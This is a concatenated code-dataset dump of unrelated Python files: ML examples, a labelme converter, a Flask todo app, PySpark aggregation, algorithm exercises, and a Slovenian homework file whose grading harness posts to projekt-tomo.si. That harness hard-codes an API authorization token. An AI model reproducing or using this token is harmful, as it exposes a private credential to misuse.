test_cost, err))\n costs.append(test_cost)\n\n\n\n# In[22]:\n\n\nimport matplotlib.pyplot as plt\n\nplt.plot(costs)\nplt.show()\n# increase max_iter and notice how the test cost starts to increase.\n# are we overfitting by adding that extra layer?\n# how would you add regularization to this model?\n\n","repo_name":"denisb411/neural_network_improved","sub_path":"tensorflow_example.py","file_name":"tensorflow_example.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"4335384608","text":"\"\"\"\nbrief: covert single json file to single image dataset.\n\nusage:python labelme_json2dataset.py json_file -o output_directory\n\nreference: https://github.com/wkentaro/labelme/blob/main/labelme/cli/json_to_dataset.py\n\"\"\"\n\n# coding=utf-8\n\nimport argparse\nimport base64\nimport json\nimport os\nimport os.path as osp\n\nimport PIL.Image\nimport imgviz\nfrom labelme import utils\nfrom labelme.logger import logger\n\n\ndef get_data_and_image(json_file):\n \"\"\"\n get data and image from json file\n :param json_file: json file\n :return: data and image\n \"\"\"\n with open(json_file, 'rb') as json_f:\n data = json.load(json_f)\n image_data = data.get('imageData')\n if not image_data:\n image_path = os.path.join(os.path.dirname(json_file), data['imagePath'])\n with open(image_path, 'rb') as image_f:\n image_data = image_f.read()\n image_data = base64.b64encode(image_data).decode('utf-8')\n img = utils.img_b64_to_arr(image_data)\n\n return data, img\n\n\ndef get_label_names(data, image):\n \"\"\"\n get label names from data and image\n :param data: data\n :param image: image\n :return: label names and lbl\n \"\"\"\n label_name_to_value = {'_background_': 0}\n for shape in sorted(data['shapes'], key=lambda x: x['label']):\n label_name = shape['label']\n if label_name in label_name_to_value:\n pass\n else:\n label_value = len(label_name_to_value)\n label_name_to_value[label_name] = label_value\n lbl, _ = utils.shapes_to_label(image.shape, data['shapes'], label_name_to_value)\n\n label_names = [None] * (max(label_name_to_value.values()) + 1)\n for name, value in label_name_to_value.items():\n label_names[value] = name\n\n return label_names, lbl\n\n\ndef save_image_and_label(image, lbl, output_dir, label_names):\n \"\"\"\n save image and label to output_dir\n :param image: image\n :param lbl: label\n :param output_dir: output directory\n :param label_names: label names\n :return:\n \"\"\"\n PIL.Image.fromarray(image).save(osp.join(output_dir, 'img.png'))\n utils.lblsave(osp.join(output_dir, 'label.png'), lbl)\n lbl_viz = imgviz.label2rgb(lbl, imgviz.asgray(image), label_names=label_names, loc=\"rb\")\n PIL.Image.fromarray(lbl_viz).save(osp.join(output_dir, 'label_viz.png'))\n\n with open(osp.join(output_dir, 'label_names.txt'), 'w', encoding=\"utf8\") as label_f:\n for lbl_name in label_names:\n label_f.write(lbl_name + '\\n')\n\n print(f\"Saved to: {output_dir}\")\n\n\ndef main():\n \"\"\" main \"\"\"\n logger.warning(\n 'This script is aimed to demonstrate how to convert the'\n 'JSON file to a single image dataset, and not to handle'\n 'multiple JSON files to generate a real-use dataset.'\n )\n logger.warning(\n \"It won't handle multiple JSON files to generate a \"\n \"real-use dataset.\"\n )\n parser = argparse.ArgumentParser()\n parser.add_argument('--json_file')\n parser.add_argument('--output_dir', default=None)\n args = parser.parse_args()\n\n json_file = args.json_file\n\n if args.output_dir is None:\n out_dir = osp.basename(json_file).replace('.', '_')\n out_dir = osp.join(osp.dirname(json_file), out_dir)\n else:\n out_dir = args.output_dir\n if not osp.exists(out_dir):\n os.mkdir(out_dir)\n\n (data, img) = get_data_and_image(json_file)\n\n (label_names, lbl) = get_label_names(data, img)\n\n save_image_and_label(img, lbl, out_dir, label_names)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"veraposeidon/labelme2Datasets","sub_path":"labelme2datasets/labelme_json2dataset.py","file_name":"labelme_json2dataset.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"2"}
+{"seq_id":"6321454734","text":"# Fix error which might appear when this script is ran from the command line\n\nimport sys\nimport os\n\nis_running_from_command_line = len(sys.path) <= 7\nif is_running_from_command_line:\n script_path_tokens = sys.path[0].split(os.sep)\n sys.path.extend([os.path.join('/', *script_path_tokens[:-1]),\n os.path.join('/', *script_path_tokens[:-2], 'evoman_framework', 'evoman')])\n\n# Fix evoman resources loading not working because framework assumes the current working directory is\n# always `evoman_framework`\n\n\nif is_running_from_command_line:\n os.chdir('./evoman_framework')\nelse:\n os.chdir('../../evoman_framework')\n\n# Start of code without hacks\n\n\nimport pso_bootstrap.parameters as parameters\n\nfrom pso_bootstrap.evoman_pso.algorithm import EvomanPsoAlgorithm\nfrom pso_bootstrap.evoman_pso.parameters import EvomanPsoParameters\n\nfrom utils.pickle import save_class_instance\n\nif __name__ == '__main__':\n evoman_pso_parameters = EvomanPsoParameters(\n enemies_chosen_for_training=parameters.ENEMIES_CHOSEN_FOR_TRAINING,\n model_hidden_layers_sizes=parameters.MODEL_HIDDEN_LAYERS_SIZES,\n model_min_weight=parameters.MODEL_MIN_WEIGHT,\n model_max_weight=parameters.MODEL_MAX_WEIGHT,\n pop_size=parameters.POP_SIZE,\n nr_iterations=parameters.NR_ITERATIONS,\n inertia_initial_weight=parameters.INERTIA_INITIAL_WEIGHT,\n cognitive_weight=parameters.COGNITIVE_WEIGHT,\n social_weight=parameters.SOCIAL_WEIGHT,\n min_particle_speed=parameters.MIN_PARTICLE_SPEED,\n max_particle_speed=parameters.MAX_PARTICLE_SPEED,\n thread_pool_size=parameters.THREAD_POOL_SIZE\n )\n\n evoman_pso_algorithm = EvomanPsoAlgorithm(evoman_pso_parameters)\n evoman_pso_solution = evoman_pso_algorithm.train()\n\n evoman_pso_parameters.enemies_chosen_for_training.sort()\n pso_bootstrap_trained_models_dir = f'../trained_models/pso_bootstrap/{evoman_pso_parameters.enemies_chosen_for_training}'\n pso_bootstrap_trained_model_name = f'{evoman_pso_solution.model_fitness:.2f}'\n\n save_class_instance(evoman_pso_solution, pso_bootstrap_trained_models_dir, pso_bootstrap_trained_model_name,\n is_with_timestamp=True)\n","repo_name":"gabrielxzc/evoman-game-playing-competition-WCCI-2020","sub_path":"code/pso_bootstrap/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"16200947710","text":"from flask import Flask , render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\n\n\nmyapp = Flask(__name__)\nmyapp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'\ndb = SQLAlchemy(myapp)\n\nclass flaskDB(db.Model):\n id = db.Column(db.Integer,primary_key = True)\n title = db.Column(db.String(100))\n status = db.Column(db.Boolean)\n \n\n@myapp.route('/')\ndef home():\n incompleted_list = flaskDB.query.filter_by(status=False).all()\n completed_list = flaskDB.query.filter_by(status=True).all()\n return render_template('base.html', incompleted_list=incompleted_list, completed_list=completed_list)\n\n@myapp.route('/add', methods=['POST'])\ndef add_item():\n activity_name = request.form.get('item')\n add_row = flaskDB(title=activity_name, status=False)\n db.session.add(add_row)\n db.session.commit()\n return redirect(url_for('home'))\n\n@myapp.route(\"/complete/\")\ndef complete(todo_id):\n complete_row = flaskDB.query.filter_by(id=todo_id).first()\n complete_row.status = True\n db.session.commit()\n return redirect(url_for('home'))\n\n@myapp.route(\"/delete/\")\ndef delete(todo_id):\n del_row = flaskDB.query.filter_by(id=todo_id).first()\n db.session.delete(del_row)\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n\n\nif __name__ == '__main__':\n db.create_all()\n myapp.run(debug=True)\n","repo_name":"Sreeja1850/MyProject","sub_path":"flask_todo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"18132746909","text":"# =============================================================================\n# Plače\n#\n# V nekem uspešnem slovenskem podjetju so zaposleni urejeni hierarhično. Vsakdo\n# razen direktorja ima natanko enega nadrejenega. Vsak uslužbenec ima lahko pod\n# seboj največ dva podrejena (levega in desnega). Primer takšne hierarhije (številke\n# so njihove plače):\n# \n# lucka = Drevo(('Lučka', 800), levo=Drevo(('Peter', 900)), desno=Drevo(('Tadeja', 700)))\n# matjaz = Drevo(('Matjaž', 1100), levo=Drevo(('Simona', 700)), desno=Drevo(('Boris', 1000), levo=lucka))\n# branko = Drevo(('Branko', 900), desno=Drevo(('Benjamin', 1100)))\n# ales = Drevo(('Aleš', 1500), levo=matjaz, desno=branko)\n# \n# V tem podjetju imajo zelo močen sindikat. Sindikalisti so ugotovili, da višine\n# plač niso pravične. Nedopustno je, da imajo nekateri podrejeni višje plače od\n# svojih nadrejenih! Zato sindikat zahteva, da mora imeti vsak zaposleni vsaj za\n# 100 € višjo plačo od kateregakoli svojega podrejenega.\n# \n# Direktor bi rad analiziral podatke, preden se spusti v pogajanja s sindikalisti.\n# Podatke o plačah zaposlenih je shranil v dvojiško drevo, v katerem so v\n# vozliščih shranjeni pari z imeni in plačami zaposlenih.\n# =====================================================================@010479=\n# 1. podnaloga\n# Direktorja zanima, koliko dodatnega denarja bi potreboval vsak mesec, če bi\n# ugodil zahtevam sindikata. Želi, da sestavite funkcijo `odprava_krivic(sef)`,\n# ki vrne skupno vsoto denarja, ki bi ga potreboval za odpravo krivic. Primer\n# (če `d` ustreza zgornji sliki):\n# \n# >>> odprava_krivic(d)\n# 700\n# \n# _Komentar:_ Lučka bi po novem prejemala 1000 €, ker dobiva Peter 900 €.\n# Zaradi Lučke bi moral Boris prejemati 1100 €. Zaradi Borisa pa bi moral\n# Matjaž prejemati 1200 €. Branko bi zaradi Benjamina moral prejemati 1200 €.\n# Vsota vseh povišic znaša 700 €.\n# \n# _Komentar 2:_ ne pozabite, da se plače nikomur ne znižajo. Torej če imata podrejena\n# plačo 800 in 900, šef pa 1500 in se recimo zgodi, da bosta podrejena po novem imela\n# plači 850 in 1100, bo šef obdržal plačo 1500 (in ne dobil recimo plačo 1200)\n# =============================================================================\n\n# =====================================================================@010480=\n# 2. podnaloga\n# Direktor bi sindikaliste rad prepričal, da se razburjajo po nepotrebnem.\n# Rad bi imel seznam imen vseh tistih uslužbencev, ki bi prejeli povišice.\n# (Od vseh takih bo namreč pridobil pisne izjave, da so zadovoljni s svojo\n# plačo.) Napišite funkcijo `pisne_izjave(sef)`, ki vrne množico imen vseh\n# zaposlenih, ki bi prejeli povišico. Primer:\n# \n# >>> pisne_izjave(d)\n# {'Lučka', 'Boris', 'Branko', 'Matjaž'}\n# =============================================================================\n\n# =====================================================================@010481=\n# 3. podnaloga\n# Po večtedenskih pogajanjih s sindikatom je imel direktor poln k███ vsega,\n# zato je udaril po mizi! Odločil se je, da bo najprej vsem plače zmanjšal\n# na \"minimalce\", potem pa bo povišal plače na način, ki ga predlaga sindikat.\n# Tako bo volk sit in koza cela. Napišite funkcijo `uravnilovka(sef)`, ki vrne\n# skupno vsoto denarja, ki bi ga na ta način prihranil vsak mesec (glede na\n# trenutne plače). \"Minimalec\" znaša 500 €. Primer:\n# \n# >>> uravnilovka(d)\n# 3100\n# =============================================================================\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# ============================================================================@\n\n'Če vam Python sporoča, da je v tej vrstici sintaktična napaka,'\n'se napaka v resnici skriva v zadnjih vrsticah vaše kode.'\n\n'Kode od tu naprej NE SPREMINJAJTE!'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport io, json, os, re, sys, shutil, traceback, urllib.error, urllib.request\n\n\nfrom contextlib import contextmanager\n\nclass Check:\n @staticmethod\n def has_solution(part):\n return part['solution'].strip() != ''\n\n @staticmethod\n def initialize(parts):\n Check.parts = parts\n for part in Check.parts:\n part['valid'] = True\n part['feedback'] = []\n part['secret'] = []\n Check.current_part = None\n Check.part_counter = None\n\n @staticmethod\n def part():\n if Check.part_counter is None:\n Check.part_counter = 0\n else:\n Check.part_counter += 1\n Check.current_part = Check.parts[Check.part_counter]\n return Check.has_solution(Check.current_part)\n\n @staticmethod\n def feedback(message, *args, **kwargs):\n Check.current_part['feedback'].append(message.format(*args, **kwargs))\n\n @staticmethod\n def error(message, *args, **kwargs):\n Check.current_part['valid'] = False\n Check.feedback(message, *args, **kwargs)\n\n @staticmethod\n def clean(x, digits=6, typed=False):\n t = type(x)\n if t is float:\n x = round(x, digits)\n # Since -0.0 differs from 0.0 even after rounding,\n # we change it to 0.0 abusing the fact it behaves as False.\n v = x if x else 0.0\n elif t is complex:\n v = complex(Check.clean(x.real, digits, typed), Check.clean(x.imag, digits, typed))\n elif t is list:\n v = list([Check.clean(y, digits, typed) for y in x])\n elif t is tuple:\n v = tuple([Check.clean(y, digits, typed) for y in x])\n elif t is dict:\n v = sorted([(Check.clean(k, digits, typed), Check.clean(v, digits, typed)) for (k, v) in x.items()])\n elif t is set:\n v = sorted([Check.clean(y, digits, typed) for y in x])\n else:\n v = x\n return (t, v) if typed else v\n\n @staticmethod\n def secret(x, hint=None, clean=None):\n clean = clean or Check.clean\n Check.current_part['secret'].append((str(clean(x)), hint))\n\n @staticmethod\n def equal(expression, expected_result, clean=None, env={}):\n local_env = locals()\n local_env.update(env)\n clean = clean or Check.clean\n actual_result = eval(expression, globals(), local_env)\n if clean(actual_result) != clean(expected_result):\n Check.error('Izraz {0} vrne {1!r} namesto {2!r}.',\n expression, actual_result, expected_result)\n return False\n else:\n return True\n\n @staticmethod\n def run(statements, expected_state, clean=None, env={}):\n code = \"\\n\".join(statements)\n statements = \" >>> \" + \"\\n >>> \".join(statements)\n s = {}\n s.update(env)\n clean = clean or Check.clean\n exec(code, globals(), s)\n errors = []\n for (x, v) in expected_state.items():\n if x not in s:\n errors.append('morajo nastaviti spremenljivko {0}, vendar je ne'.format(x))\n elif clean(s[x]) != clean(v):\n errors.append('nastavijo {0} na {1!r} namesto na {2!r}'.format(x, s[x], v))\n if errors:\n Check.error('Ukazi\\n{0}\\n{1}.', statements, \";\\n\".join(errors))\n return False\n else:\n return True\n\n @staticmethod\n @contextmanager\n def in_file(filename, content, encoding=None):\n with open(filename, 'w', encoding=encoding) as f:\n for line in content:\n print(line, file=f)\n old_feedback = Check.current_part['feedback'][:]\n yield\n new_feedback = Check.current_part['feedback'][len(old_feedback):]\n Check.current_part['feedback'] = old_feedback\n if new_feedback:\n new_feedback = ['\\n '.join(error.split('\\n')) for error in new_feedback]\n Check.error('Pri vhodni datoteki {0} z vsebino\\n {1}\\nso se pojavile naslednje napake:\\n- {2}', filename, '\\n '.join(content), '\\n- '.join(new_feedback))\n\n @staticmethod\n @contextmanager\n def input(content, encoding=None):\n old_stdin = sys.stdin\n old_feedback = Check.current_part['feedback'][:]\n sys.stdin = io.StringIO('\\n'.join(content))\n try:\n yield\n finally:\n sys.stdin = old_stdin\n new_feedback = Check.current_part['feedback'][len(old_feedback):]\n Check.current_part['feedback'] = old_feedback\n if new_feedback:\n new_feedback = ['\\n '.join(error.split('\\n')) for error in new_feedback]\n Check.error('Pri vhodu\\n {0}\\nso se pojavile naslednje napake:\\n- {1}', '\\n '.join(content), '\\n- '.join(new_feedback))\n\n @staticmethod\n def out_file(filename, content, encoding=None):\n with open(filename, encoding=encoding) as f:\n out_lines = f.readlines()\n equal, diff, line_width = Check.difflines(out_lines, content)\n if equal:\n return True\n else:\n Check.error('Izhodna datoteka {0}\\n je enaka{1} namesto:\\n {2}', filename, (line_width - 7) * ' ', '\\n '.join(diff))\n return False\n\n @staticmethod\n def output(expression, content, use_globals=False):\n old_stdout = sys.stdout\n sys.stdout = io.StringIO()\n try:\n def visible_input(prompt):\n inp = input(prompt)\n print(inp)\n return inp\n exec(expression, globals() if use_globals else {'input': visible_input})\n finally:\n output = sys.stdout.getvalue().strip().splitlines()\n sys.stdout = old_stdout\n equal, diff, line_width = Check.difflines(output, content)\n if equal:\n return True\n else:\n Check.error('Program izpiše{0} namesto:\\n {1}', (line_width - 13) * ' ', '\\n '.join(diff))\n return False\n\n @staticmethod\n def difflines(actual_lines, expected_lines):\n actual_len, expected_len = len(actual_lines), len(expected_lines)\n if actual_len < expected_len:\n actual_lines += (expected_len - actual_len) * ['\\n']\n else:\n expected_lines += (actual_len - expected_len) * ['\\n']\n equal = True\n line_width = max(len(actual_line.rstrip()) for actual_line in actual_lines + ['je enaka'])\n diff = []\n for out, given in zip(actual_lines, expected_lines):\n out, given = out.rstrip(), given.rstrip()\n if out != given:\n equal = False\n diff.append('{0} {1} {2}'.format(out.ljust(line_width), '|' if out == given else '*', given))\n return equal, diff, line_width\n\n @staticmethod\n def generator(expression, expected_values, should_stop=False, further_iter=0, env={}, clean=None):\n from types import GeneratorType\n local_env = locals()\n local_env.update(env)\n clean = clean or Check.clean\n gen = eval(expression, globals(), local_env)\n if not isinstance(gen, GeneratorType):\n Check.error(\"Izraz {0} ni generator.\", expression)\n return False\n\n try:\n for iteration, expected_value in enumerate(expected_values):\n actual_value = next(gen)\n if clean(actual_value) != clean(expected_value):\n Check.error(\"Vrednost #{0}, ki jo vrne generator {1} je {2!r} namesto {3!r}.\",\n iteration, expression, actual_value, expected_value)\n return False\n for _ in range(further_iter):\n next(gen) # we will not validate it\n except StopIteration:\n Check.error(\"Generator {0} se prehitro izteče.\", expression)\n return False\n \n if should_stop:\n try:\n next(gen)\n Check.error(\"Generator {0} se ne izteče (dovolj zgodaj).\", expression)\n except StopIteration:\n pass # this is fine\n return True\n\n @staticmethod\n def summarize():\n for i, part in enumerate(Check.parts):\n if not Check.has_solution(part):\n print('{0}. podnaloga je brez rešitve.'.format(i + 1))\n elif not part['valid']:\n print('{0}. podnaloga nima veljavne rešitve.'.format(i + 1))\n else:\n print('{0}. podnaloga ima veljavno rešitev.'.format(i + 1))\n for message in part['feedback']:\n print(' - {0}'.format('\\n '.join(message.splitlines())))\n\n\ndef _validate_current_file():\n def extract_parts(filename):\n with open(filename, encoding='utf-8') as f:\n source = f.read()\n part_regex = re.compile(\n r'# =+@(?P\\d+)=\\n' # beginning of header\n r'(#( [^\\n]*)?\\n)+' # description\n r'# =+\\n' # end of header\n r'(?P.*?)' # solution\n r'(?=\\n# =+@)', # beginning of next part\n flags=re.DOTALL | re.MULTILINE\n )\n parts = [{\n 'part': int(match.group('part')),\n 'solution': match.group('solution')\n } for match in part_regex.finditer(source)]\n # The last solution extends all the way to the validation code,\n # so we strip any trailing whitespace from it.\n parts[-1]['solution'] = parts[-1]['solution'].rstrip()\n return parts\n\n def backup(filename):\n backup_filename = None\n suffix = 1\n while not backup_filename or os.path.exists(backup_filename):\n backup_filename = '{0}.{1}'.format(filename, suffix)\n suffix += 1\n shutil.copy(filename, backup_filename)\n return backup_filename\n\n def submit_parts(parts, url, token):\n submitted_parts = []\n for part in parts:\n if Check.has_solution(part):\n submitted_part = {\n 'part': part['part'],\n 'solution': part['solution'],\n 'valid': part['valid'],\n 'secret': [x for (x, _) in part['secret']],\n 'feedback': json.dumps(part['feedback']),\n }\n if 'token' in part:\n submitted_part['token'] = part['token']\n submitted_parts.append(submitted_part)\n data = json.dumps(submitted_parts).encode('utf-8')\n headers = {\n 'Authorization': token,\n 'content-type': 'application/json'\n }\n request = urllib.request.Request(url, data=data, headers=headers)\n response = urllib.request.urlopen(request)\n return json.loads(response.read().decode('utf-8'))\n\n def update_attempts(old_parts, response):\n updates = {}\n for part in response['attempts']:\n part['feedback'] = json.loads(part['feedback'])\n updates[part['part']] = part\n for part in old_parts:\n valid_before = part['valid']\n part.update(updates.get(part['part'], {}))\n valid_after = part['valid']\n if valid_before and not valid_after:\n wrong_index = response['wrong_indices'].get(str(part['part']))\n if wrong_index is not None:\n hint = part['secret'][wrong_index][1]\n if hint:\n part['feedback'].append('Namig: {}'.format(hint))\n\n\n filename = os.path.abspath(sys.argv[0])\n file_parts = extract_parts(filename)\n Check.initialize(file_parts)\n\n if Check.part():\n \n try:\n lucka = Drevo(('Lučka', 800), levo=Drevo(('Peter', 900)), desno=Drevo(('Tadeja', 700)))\n matjaz = Drevo(('Matjaž', 1100), levo=Drevo(('Simona', 700)), desno=Drevo(('Boris', 1000), levo=lucka))\n branko = Drevo(('Branko', 900), desno=Drevo(('Benjamin', 1100)))\n ales = Drevo(('Aleš', 1500), levo=matjaz, desno=branko)\n Check.equal(\"\"\"odprava_krivic(ales)\"\"\", 700, env = {\"ales\": ales})\n except:\n Check.error(\"Testi sprožijo izjemo\\n {0}\",\n \"\\n \".join(traceback.format_exc().split(\"\\n\"))[:-2])\n\n if Check.part():\n \n try:\n lucka = Drevo(('Lučka', 800), levo=Drevo(('Peter', 900)), desno=Drevo(('Tadeja', 700)))\n matjaz = Drevo(('Matjaž', 1100), levo=Drevo(('Simona', 700)), desno=Drevo(('Boris', 1000), levo=lucka))\n branko = Drevo(('Branko', 900), desno=Drevo(('Benjamin', 1100)))\n ales = Drevo(('Aleš', 1500), levo=matjaz, desno=branko)\n Check.equal(\"\"\"pisne_izjave(ales)\"\"\", {'Lučka', 'Boris', 'Branko', 'Matjaž'}, env = {\"ales\": ales})\n except:\n Check.error(\"Testi sprožijo izjemo\\n {0}\",\n \"\\n \".join(traceback.format_exc().split(\"\\n\"))[:-2])\n\n if Check.part():\n \n try:\n lucka = Drevo(('Lučka', 800), levo=Drevo(('Peter', 900)), desno=Drevo(('Tadeja', 700)))\n matjaz = Drevo(('Matjaž', 1100), levo=Drevo(('Simona', 700)), desno=Drevo(('Boris', 1000), levo=lucka))\n branko = Drevo(('Branko', 900), desno=Drevo(('Benjamin', 1100)))\n ales = Drevo(('Aleš', 1500), levo=matjaz, desno=branko)\n Check.equal(\"\"\"uravnilovka(ales)\"\"\", 3100, env = {\"ales\": ales})\n except:\n Check.error(\"Testi sprožijo izjemo\\n {0}\",\n \"\\n \".join(traceback.format_exc().split(\"\\n\"))[:-2])\n\n print('Shranjujem rešitve na strežnik... ', end=\"\")\n try:\n url = 'https://www.projekt-tomo.si/api/attempts/submit/'\n token = 'Token a7d3422f9635f98a67f097384251c60b342d336e'\n response = submit_parts(Check.parts, url, token)\n except urllib.error.URLError:\n print('PRI SHRANJEVANJU JE PRIŠLO DO NAPAKE! Poskusite znova.')\n else:\n print('Rešitve so shranjene.')\n update_attempts(Check.parts, response)\n if 'update' in response:\n print(\"Posodabljam datoteko... \", end=\"\")\n backup_filename = backup(filename)\n r = urlopen(response['update'])\n with open(filename, 'w', encoding='utf-8') as f:\n f.write(r.read().decode('utf-8'))\n print(\"Stara datoteka je preimenovana v {0}.\".format(os.path.basename(backup_filename)))\n print(\"Če se datoteka v urejevalniku ni osvežila, jo zaprite ter ponovno odprite.\")\n Check.summarize()\n\nif __name__ == '__main__':\n _validate_current_file()\n","repo_name":"jakobvalic/RAC-1","sub_path":"7-uporaba-dvojiskih-dreves/place.py","file_name":"place.py","file_ext":"py","file_size_in_byte":18516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"11544038455","text":"# 행에서 카드를 한장 뽑을 때, 행에서는 가장 작은 수지만, 가장 작은 수 중 큰수 뽑기\n\n\"\"\"\n정렬로만으로 풀 수 있을 것 같음\n2차원 배열을 각각 정렬\n\n\"\"\"\n\n#n, m = map(int, input().split())\n\ndef sol(n,m, cards):\n sorted_list = []\n for list in cards:\n sorted_list.append(sorted(list))\n sorted_list.sort(key=lambda x: x[0])\n return sorted_list[-1][0]\n\n# 예시를 본 후 개선\ndef sol2(n,m, cards):\n result = 0\n for list in cards:\n min_value = min(list)\n result = max(result, min_value)\n return result\n\n\nmetrix = [[3,1,2], [4,1,4,], [2,2,2]]\nprint(sol(3,3, metrix))\n\nmetrix = [[7,3,1,8], [3,3,3,4]]\nprint(sol2(2,4, metrix))\n\n\n# 예시 1\nn,m = map(int, input().split())\nresult = 0\n\nfor i in range(n):\n data = list(map(int, input().split()))\n min_value = min(data)\n result = max(result, min_value)\n\nprint(result)\n\n\n","repo_name":"hryeong66/Algorithm","sub_path":"이것이코딩테스트/greedy/숫자_카드_게임.py","file_name":"숫자_카드_게임.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"39964353817","text":"from pyspark import SparkConf\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\nmyconf = SparkConf()\nmyconf.set(\"spark.app.name\", \"group_Aggregation\")\nmyconf.set(\"spark.master\", \"local[*]\")\n\nspark = SparkSession.builder.config(conf=myconf).getOrCreate()\n\ninvoiceDF = spark.read.format(\"csv\")\\\n .option(\"inferSchema\", True)\\\n .option(\"header\", True)\\\n .option(\"path\", \"C:\\\\Users\\\\hp\\\\Desktop\\\\week12\\\\order_data.csv\")\\\n .load()\n\n# column object expression\nresultDF = invoiceDF.groupBy(\"Country\", \"InvoiceNo\")\\\n .agg(sum(\"Quantity\").alias(\"TotalQuantity\"),\n sum(expr(\"Quantity * UnitPrice\")).alias(\"InvoiceValue\"))\nresultDF.show()\n\n# column string expression\nresultDF = invoiceDF.groupBy(\"Country\", \"InvoiceNo\")\\\n .agg(expr(\"sum(Quantity) as TotalQuantity\"),\nexpr(\"sum(Quantity * UnitPrice) as InvoiceValue\"))\nresultDF.show()\n\n# spark SQL\ninvoiceDF.createOrReplaceTempView(\"sales\")\nspark.sql(\"\"\" select country, InvoiceNo, sum(Quantity) as totQty, sum(Quantity * UnitPrice)\nas InvoiceValue from sales group by country, InvoiceNo\"\"\").show()\n","repo_name":"anjalinc10/pyspark-dataframe-exercises","sub_path":"group_Aggregation.py","file_name":"group_Aggregation.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"714935045","text":"def paper(x):\n if x == n:\n return 1\n if x > n:\n return 0\n return paper(x+10) + paper(x+20) * 2\n\nT = int(input())\nanswer = []\nfor tc in range(1, T + 1):\n n = int(input())\n answer.append('#%d %d\\n' %(tc, paper(0)))\nprint(''.join(answer))\n\n'''\n# 시간제한 걸린 코드\ndef paper(i, n):\n if i == n:\n global cnt\n cnt += 1\n else:\n if n - i == 10:\n paper(i+10, n)\n else:\n paper(i+10, n)\n paper(i+20, n)\n paper(i+20, n)\nT = int(input())\nanswer = []\nfor tc in range(1, T+1):\n n = int(input())\n cnt = 0\n paper(0,n)\n answer.append('#%d %d\\n' %(tc, cnt))\nprint(''.join(answer))\n'''","repo_name":"woo3gyeob/algorithm_swea","sub_path":"0223/4869.종이붙이기.py","file_name":"4869.종이붙이기.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31617910768","text":"from argparse import ArgumentParser, RawDescriptionHelpFormatter\nfrom pathlib import Path\nimport typing as t\n\nfrom git.repo import Repo\nfrom tqdm import tqdm\n\nfrom gitout._data import VERSION\nfrom gitout.util import confirm\nfrom gitout.path import Filter\nfrom .walker import Walker\n\nPROGNAME = \"gitout-update\"\nDESCRIPTION = \"Update all bare repositories in a directory with git fetch.\"\nEPILOG = \"\"\n\ndef make_parser() -> ArgumentParser:\n cli = ArgumentParser(\n description=DESCRIPTION,\n epilog=EPILOG,\n formatter_class=RawDescriptionHelpFormatter\n )\n cli.add_argument(\"--version\", action=\"version\", version=f\"{PROGNAME} {VERSION}\")\n cli.add_argument(\n \"directories\",\n action=\"append\",\n nargs=\"*\",\n type=Path,\n help=\"Directories where the repositories are stored.\"\n )\n cli.add_argument(\n \"-r\",\n \"--recursive\",\n action=\"count\",\n default=0,\n help=\"Search for repositories in recursively. \\\nIf -r is passed, gitout-update assumes that a directory that is a git \\\nrepository will not contain repository mirrors in any of its subdirectories. \\\nIf -rr is passed, gitout-update will git fetch all repositories, even if they \\\nare inside another repo.\"\n )\n cli.add_argument(\n \"-i\",\n \"--include\",\n action=\"append\",\n default=[],\n help=\"List of regex patterns to determine which absolute paths should be fetched. \\\nAll repos are included by default (i.e. r'.*' implied).\"\n )\n cli.add_argument(\n \"-e\",\n \"--exclude\",\n action=\"append\",\n default=[],\n help=\"List of regex patterns to determine which absolute paths should not be fetched. \\\nIf the repo's path matches an exclude pattern, that repo will be excluded from even if \\\nit matches one of the include patterns.\"\n )\n cli.add_argument(\n \"-s\",\n \"--skip\",\n action=\"store_true\",\n help=\"Skip a remote if an error occurs while fetching it.\"\n )\n cli.add_argument(\n \"-y\",\n \"--yes\",\n \"--assume-yes\",\n action=\"store_true\",\n help=\"Automatically assumes 'yes' as answer to the prompt asking whether to update the \\\nof repos.\"\n )\n return cli\n\n\ndef update(repo: Repo, skip_error: bool = False) -> int:\n tqdm.write(f\"Updating {repo.working_dir}\")\n count = 0\n for remote in repo.remotes:\n tqdm.write(f\" {remote.name} -> {remote.url}\")\n try:\n remote.fetch(verbose=True)\n except Exception as e:\n if skip_error:\n tqdm.write(\"An error occurred trying to fetch the remote!\")\n tqdm.write(str(e))\n else:\n raise e\n else:\n count += 1\n return count\n\n\ndef main():\n cli = make_parser()\n args = cli.parse_args()\n \n # argparse 'append' behaviour stores list of lists,\n # cannot use 'extend' because we are targetting python 3.7\n directories: t.List[Path] = args.directories[0]\n if len(directories) == 0:\n directories.append(Path(\".\"))\n \n pfilter = Filter(includes=args.include, excludes=args.exclude)\n \n repos: t.List[Repo] = 